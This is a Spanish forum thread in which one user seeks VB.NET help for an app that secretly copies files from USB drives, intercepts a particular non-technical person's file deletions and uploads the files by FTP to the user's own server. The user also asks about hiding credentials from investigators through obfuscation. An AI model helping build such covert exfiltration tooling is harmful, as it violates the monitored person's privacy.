elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1]
1  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 2 Enero 2014, 01:37 am
Gracias Electro, de nuevo. XDDD, ¿Cuántas veces te vas a cambiar de nick?  :laugh: :laugh:
El código que me enviaste va estupendo. Ahora esoty intentando implementar que cuando se produzca el interceptado del borrado de archivo se envíe  por ftp a un alojamiento que tengo contratado.
Lo estoy haciendo con esto:

My.Computer.Network.UploadFile("c:\2.jpg", "http://ftp://miespacio.es/e.jpg", "nombreUsuario", "Contraseña", False, 1000)

Me sube el archivo al alojamiento, pero.... jejeje, y ahora vienen los peros:
1º Lo veo lento en relación con el cliente FileZilla que uso para mi web (provengo de php)
2º Aunque en principio esto que estoy haciendo es para aprender un poco y para una persona en particular que no tiene conocimiento informáticos alguno, mediante herramientas podrían ver mi alojamiento, usuario y clave en caso de investigación, aunque claro está qu en no voy a espiar a la nasa ni nada de eso.
3º He leído que se puede ofuscar el código, pero.. no encuentro ninguno gratuito fiable.
4º ¿Uso el código de arriba o es mejor utilizar la clase FtpWebRequest?

Muchas gracias y saludos.
PD: Feliz Año.

2  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 29 Diciembre 2013, 23:04 pm
 ;-) ;-) ;-)Jajajaja, qué mákina, estaba utilizando el 3.0
Voy a verlo y te comento.
Gracias de nuevo

--------------------------------------------------------------------------

Esto va de lujo Elektro, asombrada me dejas. Voy a modificar un poco para que se ajuste a mis intereses, a ver si no lo fastidio.
Por cierto, Electro, yo que vengo del vb 5 y 6, y me estoy metiendo poco a poco con el net. El tema de trabajar con las framework ¿es parecido a como se trabajaban las apis en las anteriores versiones?

Saludos.
3  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 29 Diciembre 2013, 12:03 pm
ElectroZoider (¿Te has cambiado el nick?, te has salido.
Vaya tela, la clase que me acabas de ofrecer. Voy a analizarla un poco y ya te cuento. De verdad muchas gracias. Yo no tengo ese nivel todavía, algunas cosas se me escapan, sobre todo a la hora de buscar las declaraciones correctas, funciones de las namespaces, tipo de atributos segun su estructura....
En fin poco a poco voy aprendiendo con gente como tú.
Muchas gracias, en cuanto lo pruebe te lo comento.

-----------------------------------------------------------------------------
Ya he hecho las comprobaciones.  Me da error en la declaración que realizas en la línea 38:
         Dim LastDeletedItem As Shell32.FolderItem = DeletedItems.LastOrDefault me dice:

'LastOrDefault' no es un miembro de 'System.Collections.Generic.IEnumerable(Of Shell32.FolderItem)'.   

y si le doy a ignorar errores y lo ejecuto, una vez elimino un archivo se rompe el programa mostrándome lo siguiente:

No se controló MissingMemberException

No se encuentra el miembro público 'Cast' en el tipo 'FolderItems3'.

Alguna idea del porqué? Saludos y gracias.
4  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 28 Diciembre 2013, 21:00 pm
Hola ElectroSoft, gracias por la ayuda.
En principio voy a descartar el hacerlo mediante la interface ICopiHook y el DeleteFile del kernel.dll, ya que si solo intercepta el borrado mediante shell, pues creo que no me vale.
Mi intención es que intecepte los eventos habituales de un borrado de archivo, seleccionarlo y pulsa la tecla suprimir, quizás se pueda inteceptar esas pulsaciones y actuar en consecuencia, aunque tendría que realizar un bucle infinito, algo que no me gusta demasiado.
He estado un par de hora  investigando sobre la función NtSetFileInformation, pero la verdad es que hay bien poco.
Alguna orientación más que me puedas dar. Tus consejos son bienvenidos, gracias a ellos voy viendo por donde tirar.
Saludos y gracias de nuevo.



He localizado este enlace donde se puede extraer alguna informacion, ahora es necesario descifrarlo  :rolleyes:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/NtDeleteFile.html



[MOD]: No hagas doble post, utiliza el botón 'MODIFICAR'.
5  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 28 Diciembre 2013, 17:18 pm
Muchas gracias a los dos.
En principio quiero hacerlo bien, pero me parece Elektrosoft que eso puede sobrepasar mi nivel de conocimientos. De todas formas lo miraré.
Una pregunta: ¿Con kernel.dll y user32.dll no podría conseguir algo? Por ejemplo con las deletefile, etc...?
Gracias
6  Programación / .NET (C#, VB.NET, ASP) / Re: Interceptar borrado de archivo en: 28 Diciembre 2013, 13:08 pm
Bueno, no consigo encontrar nada por ahí referente al tema.
Pienso que quizás podría intentar algo como capturar el proceso y los argumentos que utiliza Windows cuando recibe la orden de borrado de archivos.
Pero ¿como se llama ese proceso?¿Cómo interceptarlo?, etc...
Si alguien tiene alguna idea, por favor, que lo postee.
Gracias y saludos
7  Programación / .NET (C#, VB.NET, ASP) / Interceptar borrado de archivo en: 28 Diciembre 2013, 02:11 am
Hola a todos, estoy dando los ultimos toques a una aplicación realizada en vb.net.
La aplicación detecta la introducción de usb en el pc y realiza una copia en el disco de archivos segun unos filtros determinados, comprobando previamente que ya no exista mediante codificacion md5.
Pero quiero ir un poco más allá, y he pensado en que se realice una copia del fichero que el usuario intente eliminar, ya que esta eliminacion puede deberse a dos motivos:
  • 1. A que el archivo no le valga
  • 2. Que el archivo sea digámoslo "comprometido" y le interese eliminarlo
He estado haciendo pruebas con el systemfilewatcher, pero solo detecta los eventos una vez producidos, por lo que cuando intento copiar el archivo, este ya no existe.
La pregunta es, ¿Existe alguna forma de interceptar ese intento de borrado para realizar una copia previa de dicho archivo?

Gracias.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines